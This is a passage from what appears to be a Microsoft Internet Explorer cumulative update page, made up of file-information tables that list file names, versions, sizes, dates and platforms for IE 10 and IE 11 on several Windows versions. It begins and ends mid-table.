23-Nov-2019| 01:41| Not applicable \nIeproxy.dll| 11.0.9600.19572| 301,056| 19-Nov-2019| 06:57| x86 \nIeshims.dll| 11.0.9600.19572| 290,304| 19-Nov-2019| 07:02| x86 \nIertutil.dll| 11.0.9600.19572| 2,304,000| 19-Nov-2019| 07:56| x86 \nSqmapi.dll| 6.2.9200.16384| 228,232| 23-Nov-2019| 01:12| x86 \nIeframe.dll.mui| 11.0.9600.19572| 2,066,432| 23-Nov-2019| 01:14| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,120,704| 23-Nov-2019| 01:14| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,075,136| 23-Nov-2019| 01:15| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,063,360| 23-Nov-2019| 01:16| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,313,728| 23-Nov-2019| 01:17| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,390,016| 23-Nov-2019| 01:18| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,032,640| 23-Nov-2019| 02:38| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,307,584| 23-Nov-2019| 01:19| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,255,360| 23-Nov-2019| 01:19| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,061,312| 23-Nov-2019| 01:20| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,325,504| 23-Nov-2019| 01:21| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,019,840| 23-Nov-2019| 01:22| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,070,528| 23-Nov-2019| 01:23| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,082,304| 23-Nov-2019| 01:23| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,307,072| 23-Nov-2019| 01:24| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,170,368| 23-Nov-2019| 01:25| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,153,984| 23-Nov-2019| 01:26| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,291,712| 23-Nov-2019| 01:27| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,283,520| 23-Nov-2019| 01:28| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,051,584| 23-Nov-2019| 01:28| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,301,440| 23-Nov-2019| 01:29| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,093,056| 23-Nov-2019| 01:30| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,075,136| 23-Nov-2019| 01:31| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,298,880| 23-Nov-2019| 01:32| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,094,080| 23-Nov-2019| 01:32| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,316,800| 23-Nov-2019| 01:33| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,305,024| 23-Nov-2019| 01:34| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,278,912| 23-Nov-2019| 01:35| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,277,888| 23-Nov-2019| 01:36| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,059,776| 23-Nov-2019| 01:36| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,315,264| 23-Nov-2019| 01:37| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,278,912| 23-Nov-2019| 01:38| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,324,480| 23-Nov-2019| 01:39| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,098,176| 23-Nov-2019| 01:40| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 1,890,304| 23-Nov-2019| 01:41| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 1,890,304| 23-Nov-2019| 01:42| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 29,184| 23-Nov-2019| 01:14| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 29,696| 23-Nov-2019| 01:14| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 32,768| 23-Nov-2019| 01:15| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 33,280| 23-Nov-2019| 01:16| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 35,328| 23-Nov-2019| 01:16| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 37,888| 23-Nov-2019| 01:17| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 29,696| 23-Nov-2019| 02:38| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 34,304| 23-Nov-2019| 01:18| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 29,696| 23-Nov-2019| 01:19| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 33,280| 23-Nov-2019| 01:20| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 34,304| 23-Nov-2019| 01:21| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 27,648| 23-Nov-2019| 01:21| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 29,696| 23-Nov-2019| 01:22| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 34,304| 23-Nov-2019| 01:23| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 33,792| 23-Nov-2019| 01:24| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 23,040| 23-Nov-2019| 01:25| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 22,016| 23-Nov-2019| 01:25| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 29,696| 23-Nov-2019| 01:27| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 29,696| 23-Nov-2019| 01:27| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 31,232| 23-Nov-2019| 01:28| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 34,304| 23-Nov-2019| 01:29| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 35,840| 23-Nov-2019| 01:29| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 32,768| 23-Nov-2019| 01:30| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 33,280| 23-Nov-2019| 01:31| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 29,696| 23-Nov-2019| 01:32| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 34,816| 23-Nov-2019| 01:33| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 33,280| 23-Nov-2019| 01:34| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 32,256| 23-Nov-2019| 01:34| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 29,696| 23-Nov-2019| 01:35| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 32,768| 23-Nov-2019| 01:36| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 29,696| 23-Nov-2019| 01:37| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 30,720| 23-Nov-2019| 01:38| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 29,696| 23-Nov-2019| 01:39| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 16,384| 23-Nov-2019| 01:39| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 16,896| 23-Nov-2019| 01:40| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 16,896| 23-Nov-2019| 01:41| Not applicable \n \n## Internet Explorer 10 on all supported x64-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nWindows.ui.xaml.dll| 6.2.9200.22722| 13,658,112| 26-Mar-2019| 04:09| x64 \nHlink.dll| 6.2.9200.22522| 96,256| 19-Jul-2018| 05:09| x64 \nUrlmon.dll| 10.0.9200.22931| 1,395,712| 21-Nov-2019| 05:11| x64 \nIexplore.exe| 10.0.9200.22387| 775,816| 20-Feb-2018| 20:17| x64 \nHtml.iec| 2019.0.0.22387| 441,856| 20-Feb-2018| 17:49| Not applicable \nInetcpl.cpl| 10.0.9200.22858| 1,509,376| 27-Aug-2019| 04:55| Not applicable \nJsproxy.dll| 10.0.9200.22387| 53,248| 20-Feb-2018| 19:46| x64 \nWininet.dll| 10.0.9200.22931| 2,247,168| 21-Nov-2019| 05:11| x64 \nIdctrls.dll| 6.2.9200.22671| 75,776| 24-Jan-2019| 05:13| x64 \nIedkcs32.dll| 18.0.9200.22695| 255,488| 12-Feb-2019| 17:29| x64 \nInstall.ins| Not applicable| 464| 21-Nov-2019| 01:20| Not applicable \nIe9props.propdesc| Not applicable| 2,843| 15-Nov-2017| 00:49| Not applicable \nIeapfltr.dat| 10.0.8411.0| 1,400,416| 21-Nov-2017| 07:23| Not applicable \nIeapfltr.dll| 10.0.9200.22931| 762,368| 21-Nov-2019| 05:10| x64 \nTdc.ocx| 10.0.9200.22387| 77,312| 20-Feb-2018| 19:47| x64 \nDxtmsft.dll| 10.0.9200.22387| 452,608| 20-Feb-2018| 19:46| x64 \nDxtrans.dll| 10.0.9200.22722| 281,088| 26-Mar-2019| 04:09| x64 \nMsfeeds.dll| 10.0.9200.22931| 603,648| 21-Nov-2019| 05:11| x64 \nMsfeeds.mof| Not applicable| 1,518| 20-Feb-2018| 16:02| Not applicable \nMshtmled.dll| 10.0.9200.22695| 96,768| 12-Feb-2019| 17:29| x64 \nMicrosoft-windows-ie-htmlrendering.ptxml| Not applicable| 3,228| 20-Feb-2018| 15:58| Not applicable \nMshtml.dll| 10.0.9200.22931| 20,150,272| 21-Nov-2019| 05:11| x64 \nMshtml.tlb| 10.0.9200.22387| 2,706,432| 20-Feb-2018| 18:00| Not applicable \nIelowutil.exe| 10.0.9200.22387| 223,744| 20-Feb-2018| 19:47| x64 \nIeproxy.dll| 10.0.9200.22671| 704,000| 24-Jan-2019| 05:13| x64 \nIeshims.dll| 10.0.9200.22387| 365,568| 20-Feb-2018| 19:46| x64 \nIcrav03.rat| Not applicable| 8,798| 15-Nov-2017| 00:49| Not applicable \nMsrating.dll| 10.0.9200.22387| 197,120| 20-Feb-2018| 19:46| x64 \nTicrf.rat| Not applicable| 1,988| 15-Nov-2017| 00:49| Not applicable \nIertutil.dll| 10.0.9200.22906| 2,690,048| 25-Oct-2019| 03:00| x64 \nIe4uinit.exe| 10.0.9200.22387| 51,712| 20-Feb-2018| 19:47| x64 \nIernonce.dll| 10.0.9200.22387| 39,936| 20-Feb-2018| 19:46| x64 \nIesetup.dll| 10.0.9200.22387| 67,072| 20-Feb-2018| 19:46| x64 \nIesysprep.dll| 10.0.9200.22387| 136,704| 20-Feb-2018| 19:46| x64 \nVgx.dll| 10.0.9200.22695| 1,085,440| 12-Feb-2019| 17:29| x64 \nIeframe.dll| 10.0.9200.22931| 15,444,992| 21-Nov-2019| 05:10| x64 \nIeframe.ptxml| Not applicable| 25,923| 20-Feb-2018| 15:58| Not applicable \nIeinstal.exe| 10.0.9200.22858| 493,568| 27-Aug-2019| 04:55| x64 \nInetres.adml| Not applicable| 496,073| 12-Jun-2018| 20:12| Not applicable \nInetres.adml| Not applicable| 471,216| 12-Jun-2018| 20:02| Not applicable \nInetres.adml| Not applicable| 521,514| 12-Jun-2018| 18:01| Not applicable \nInetres.adml| Not applicable| 891,899| 12-Jun-2018| 17:55| Not applicable \nInetres.adml| Not applicable| 431,913| 20-Feb-2018| 19:52| Not applicable \nInetres.adml| Not applicable| 513,874| 12-Jun-2018| 20:21| Not applicable \nInetres.adml| Not applicable| 499,586| 12-Jun-2018| 19:32| Not applicable \nInetres.adml| Not applicable| 544,437| 12-Jun-2018| 19:56| Not applicable \nInetres.adml| Not applicable| 539,484| 12-Jun-2018| 19:53| Not applicable \nInetres.adml| Not applicable| 518,202| 12-Jun-2018| 19:57| Not applicable \nInetres.adml| Not applicable| 603,821| 12-Jun-2018| 17:56| Not applicable \nInetres.adml| Not applicable| 499,713| 12-Jun-2018| 20:19| Not applicable \nInetres.adml| Not applicable| 460,208| 12-Jun-2018| 18:00| Not applicable \nInetres.adml| Not applicable| 519,382| 12-Jun-2018| 17:56| Not applicable \nInetres.adml| Not applicable| 527,261| 12-Jun-2018| 17:57| Not applicable \nInetres.adml| Not applicable| 505,383| 12-Jun-2018| 17:58| Not applicable \nInetres.adml| Not applicable| 511,915| 12-Jun-2018| 18:10| Not applicable \nInetres.adml| Not applicable| 761,065| 12-Jun-2018| 18:08| Not applicable \nInetres.adml| Not applicable| 481,848| 12-Jun-2018| 17:54| Not applicable \nInetres.adml| Not applicable| 492,315| 12-Jun-2018| 17:55| Not applicable \nInetres.adml| Not applicable| 395,563| 12-Jun-2018| 18:08| Not applicable \nInetres.adml| Not applicable| 411,744| 12-Jun-2018| 18:00| Not applicable \nInetres.adml| Not applicable| 411,744| 12-Jun-2018| 17:58| Not applicable \nInetres.admx| Not applicable| 1,649,803| 15-Nov-2017| 00:52| Not applicable \nJsdebuggeride.dll| 10.0.9200.22387| 148,992| 20-Feb-2018| 19:46| x64 \nPurchasewindowslicense.dll| 6.2.9200.22931| 562,688| 21-Nov-2019| 05:11| x64 \nPurchasewindowslicense.exe| 6.2.9200.22671| 22,136| 24-Jan-2019| 05:45| x64 \nInetcomm.dll| 6.2.9200.22931| 949,760| 21-Nov-2019| 05:10| x64 \nInetres.dll| 6.2.9200.22387| 84,480| 20-Feb-2018| 17:59| x64 \nFirstlogonanim.html| Not applicable| 88,435| 06-Jul-2012| 19:56| Not applicable \nMsoobefirstlogonanim.dll| 6.2.9200.22671| 47,104| 24-Jan-2019| 05:13| x64 \nPhotoviewer.dll| 6.2.9200.22858| 1,820,672| 27-Aug-2019| 04:55| x64 \nJscript9.dll| 10.0.9200.22931| 3,868,672| 21-Nov-2019| 05:11| x64 \nJscript.dll| 5.8.9200.22931| 856,576| 21-Nov-2019| 05:11| x64 \nVbscript.dll| 5.8.9200.22931| 597,504| 21-Nov-2019| 05:11| x64 \nAuthbroker.dll| 6.2.9200.22671| 96,256| 24-Jan-2019| 05:13| x64 \nAuthhost.exe| 6.2.9200.22752| 122,512| 30-Apr-2019| 04:16| x64 \nAuthhostproxy.dll| 6.2.9200.16384| 12,288| 26-Jul-2012| 03:05| x64 \nResources.pri| Not applicable| 8,544| 25-Jul-2012| 23:04| Not applicable \nWindows store.lnk| Not applicable| 2,028| 25-Jul-2012| 20:13| Not applicable \nWinstore.ui.winmd| Not applicable| 14,336| 03-Jul-2013| 05:05| Not applicable \nWinstoreui-ppdlic.xrm-ms| Not applicable| 2,885| 21-Nov-2019| 05:40| Not applicable \nWinstoreui.dll| 6.2.9200.22931| 825,344| 21-Nov-2019| 05:11| x64 \nWindows.applicationmodel.store.dll| 6.2.9200.22671| 198,656| 24-Jan-2019| 05:13| x64 \nWindows.applicationmodel.store.testingframework.dll| 6.2.9200.22931| 163,840| 21-Nov-2019| 05:11| x64 \nWsshared.dll| 6.2.9200.22931| 695,808| 21-Nov-2019| 05:11| x64 \nUxinit.dll| 6.2.9200.22387| 53,760| 20-Feb-2018| 19:46| x64 \nUxtheme.dll| 6.2.9200.22858| 909,312| 27-Aug-2019| 04:55| x64 \nWwaapi.dll| 6.2.9200.22695| 116,224| 12-Feb-2019| 17:30| x64 \nWindowswebapphost.ptxml| Not applicable| 2,055| 20-Sep-2012| 01:44| Not applicable \nWwahost.exe| 6.2.9200.22906| 423,424| 25-Oct-2019| 03:00| x64 \nWindowslivelogin.dll| 6.2.9200.22671| 305,152| 24-Jan-2019| 05:13| x64 \nIexplore.exe| 10.0.9200.22387| 770,696| 20-Feb-2018| 19:06| x86 \nHtml.iec| 2019.0.0.22387| 361,984| 20-Feb-2018| 17:24| Not applicable \nTdc.ocx| 10.0.9200.22387| 61,952| 20-Feb-2018| 18:51| x86 \nDxtmsft.dll| 10.0.9200.22387| 359,936| 20-Feb-2018| 18:51| x86 \nDxtrans.dll| 10.0.9200.22695| 228,352| 12-Feb-2019| 04:16| x86 \nMsfeeds.dll| 10.0.9200.22931| 493,568| 21-Nov-2019| 04:15| x86 \nMsfeeds.mof| Not applicable| 1,518| 20-Feb-2018| 16:01| Not applicable \nMshtmled.dll| 10.0.9200.22695| 80,384| 12-Feb-2019| 04:16| x86 \nMshtml.dll| 10.0.9200.22931| 14,723,072| 21-Nov-2019| 04:15| x86 \nMshtml.tlb| 10.0.9200.22387| 2,706,432| 20-Feb-2018| 17:33| Not applicable \nWow64_microsoft-windows-ie-htmlrendering.ptxml| Not applicable| 3,228| 20-Feb-2018| 16:00| Not applicable \nIernonce.dll| 10.0.9200.22387| 33,280| 20-Feb-2018| 18:51| x86 \nIesetup.dll| 10.0.9200.22387| 61,440| 20-Feb-2018| 18:51| x86 \nIe9props.propdesc| Not applicable| 2,843| 15-Nov-2017| 00:49| Not applicable \nIeframe.dll| 10.0.9200.22931| 13,783,552| 21-Nov-2019| 04:15| x86 \nWow64_ieframe.ptxml| Not applicable| 25,923| 20-Feb-2018| 16:00| Not applicable \nJscript9.dll| 10.0.9200.22931| 2,757,632| 21-Nov-2019| 04:15| x86 \nJscript.dll| 5.8.9200.22931| 705,536| 21-Nov-2019| 04:15| x86 \nVbscript.dll| 5.8.9200.22931| 515,584| 21-Nov-2019| 04:15| x86 \nAuthbroker.dll| 6.2.9200.22671| 74,752| 24-Jan-2019| 04:33| x86 \nUxtheme.dll| 6.2.9200.22387| 534,528| 20-Feb-2018| 16:52| x86 \nWwaapi.dll| 6.2.9200.22695| 75,264| 12-Feb-2019| 04:16| x86 \nWow64_windowswebapphost.ptxml| Not applicable| 2,055| 20-Sep-2012| 01:45| Not applicable \nWwahost.exe| 6.2.9200.22858| 334,848| 27-Aug-2019| 09:19| x86 \nWindowslivelogin.dll| 6.2.9200.22671| 233,472| 24-Jan-2019| 04:34| x86 \nWindows.ui.xaml.dll| 6.2.9200.22671| 10,803,200| 24-Jan-2019| 04:34| x86 \nHlink.dll| 6.2.9200.22522| 75,264| 19-Jul-2018| 17:49| x86 \nUrlmon.dll| 10.0.9200.22931| 1,170,944| 21-Nov-2019| 04:15| x86 \nInetcpl.cpl| 10.0.9200.22722| 1,441,280| 26-Mar-2019| 03:14| Not applicable \nJsproxy.dll| 10.0.9200.22387| 38,400| 20-Feb-2018| 18:51| x86 \nWininet.dll| 10.0.9200.22931| 1,768,448| 21-Nov-2019| 04:15| x86 \nIdctrls.dll| 6.2.9200.22671| 63,488| 24-Jan-2019| 04:33| x86 \nIedkcs32.dll| 18.0.9200.22695| 226,816| 12-Feb-2019| 04:16| x86 \nInstall.ins| Not applicable| 464| 21-Nov-2019| 01:20| Not applicable \nIeapfltr.dat| 10.0.8411.0| 1,400,416| 21-Nov-2017| 07:23| Not applicable \nIeapfltr.dll| 10.0.9200.22931| 629,248| 21-Nov-2019| 04:15| x86 \nIelowutil.exe| 10.0.9200.22671| 222,208| 24-Jan-2019| 04:34| x86 \nIeproxy.dll| 10.0.9200.22671| 258,048| 24-Jan-2019| 04:33| x86 \nIeshims.dll| 10.0.9200.22387| 245,248| 20-Feb-2018| 18:51| x86 \nIcrav03.rat| Not applicable| 8,798| 15-Nov-2017| 00:49| Not applicable \nMsrating.dll| 10.0.9200.22387| 163,840| 20-Feb-2018| 18:51| x86 \nTicrf.rat| Not applicable| 1,988| 15-Nov-2017| 00:49| Not applicable \nIertutil.dll| 10.0.9200.22931| 2,091,008| 21-Nov-2019| 04:15| x86 \nIesysprep.dll| 10.0.9200.22387| 109,056| 20-Feb-2018| 18:51| x86 \nVgx.dll| 10.0.9200.22695| 818,688| 12-Feb-2019| 04:16| x86 \nIeinstal.exe| 10.0.9200.22752| 478,720| 30-Apr-2019| 03:14| x86 \nJsdebuggeride.dll| 10.0.9200.22387| 108,032| 20-Feb-2018| 18:51| x86 \nInetcomm.dll| 6.2.9200.22931| 737,280| 21-Nov-2019| 04:15| x86 \nInetres.dll| 6.2.9200.22387| 84,480| 20-Feb-2018| 17:32| x86 \nPhotoviewer.dll| 6.2.9200.22858| 1,637,376| 27-Aug-2019| 09:19| x86 \nWindows.applicationmodel.store.dll| 6.2.9200.22671| 143,872| 24-Jan-2019| 04:34| x86 \nWindows.applicationmodel.store.testingframework.dll| 6.2.9200.22931| 124,928| 21-Nov-2019| 04:15| x86 \nWsshared.dll| 6.2.9200.22931| 568,832| 21-Nov-2019| 04:15| x86 \nUxinit.dll| 6.2.9200.22387| 44,032| 20-Feb-2018| 18:51| x86 \n**Windows 7 and Windows Server 2008 R2**\n\n## Internet Explorer 11 on all supported x86-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nUrlmon.dll| 11.0.9600.19572| 1,331,712| 19-Nov-2019| 07:01| x86 \nIexplore.exe| 11.0.9600.19572| 810,376| 23-Nov-2019| 06:57| x86 \nWebcheck.dll.mui| 11.0.9600.19572| 31,744| 23-Nov-2019| 06:59| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 36,352| 23-Nov-2019| 06:59| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 35,328| 23-Nov-2019| 07:00| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 34,816| 23-Nov-2019| 07:01| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 36,864| 23-Nov-2019| 07:01| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 39,424| 23-Nov-2019| 07:02| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 32,768| 23-Nov-2019| 08:22| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 37,376| 23-Nov-2019| 07:03| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 33,280| 23-Nov-2019| 07:04| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 34,816| 23-Nov-2019| 07:05| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 38,400| 23-Nov-2019| 07:06| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 30,720| 23-Nov-2019| 07:06| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 34,816| 23-Nov-2019| 07:07| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 35,328| 23-Nov-2019| 07:08| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 36,864| 23-Nov-2019| 07:09| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 25,600| 23-Nov-2019| 07:09| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 24,576| 23-Nov-2019| 07:10| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 35,840| 23-Nov-2019| 07:11| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 34,304| 23-Nov-2019| 07:12| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 34,304| 23-Nov-2019| 07:13| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 36,352| 23-Nov-2019| 07:13| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 35,840| 23-Nov-2019| 07:14| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 34,816| 23-Nov-2019| 07:15| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 35,840| 23-Nov-2019| 07:16| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 35,840| 23-Nov-2019| 07:17| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 34,304| 23-Nov-2019| 07:18| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 35,840| 23-Nov-2019| 07:19| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 34,816| 23-Nov-2019| 07:20| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 34,816| 23-Nov-2019| 07:20| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 34,816| 23-Nov-2019| 07:21| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 33,280| 23-Nov-2019| 07:22| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 34,304| 23-Nov-2019| 07:23| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 34,304| 23-Nov-2019| 07:23| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 20,992| 23-Nov-2019| 07:24| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 21,504| 23-Nov-2019| 07:25| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 21,504| 23-Nov-2019| 07:26| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 46,592| 23-Nov-2019| 06:58| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 52,736| 23-Nov-2019| 06:59| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 51,200| 23-Nov-2019| 07:00| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 51,200| 23-Nov-2019| 07:00| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 56,320| 23-Nov-2019| 07:01| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 57,856| 23-Nov-2019| 07:02| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 49,664| 23-Nov-2019| 08:22| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 54,272| 23-Nov-2019| 07:03| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 47,616| 23-Nov-2019| 07:04| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 49,152| 23-Nov-2019| 07:05| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 55,296| 23-Nov-2019| 07:05| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 45,056| 23-Nov-2019| 07:06| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 51,712| 23-Nov-2019| 07:08| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 51,712| 23-Nov-2019| 07:08| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 53,248| 23-Nov-2019| 07:09| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 39,424| 23-Nov-2019| 07:10| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 35,840| 23-Nov-2019| 07:11| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 50,176| 23-Nov-2019| 07:11| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 51,200| 23-Nov-2019| 07:12| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 50,688| 23-Nov-2019| 07:13| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 52,736| 23-Nov-2019| 07:14| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 53,760| 23-Nov-2019| 07:14| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 54,272| 23-Nov-2019| 07:15| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 54,272| 23-Nov-2019| 07:17| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 52,736| 23-Nov-2019| 07:17| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 51,200| 23-Nov-2019| 07:18| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 53,248| 23-Nov-2019| 07:19| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 52,736| 23-Nov-2019| 07:20| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 51,712| 23-Nov-2019| 07:20| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 50,688| 23-Nov-2019| 07:21| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 50,688| 23-Nov-2019| 07:22| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 50,176| 23-Nov-2019| 07:23| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 50,176| 23-Nov-2019| 07:23| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 30,720| 23-Nov-2019| 07:24| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 30,720| 23-Nov-2019| 07:25| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 30,720| 23-Nov-2019| 07:26| Not applicable \nInetcpl.cpl| 11.0.9600.19572| 2,058,752| 19-Nov-2019| 07:23| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 06:58| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 06:59| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:00| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:00| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:01| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:02| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 08:22| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:03| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:04| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:05| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:06| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:06| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:07| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:08| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:09| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:09| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:11| 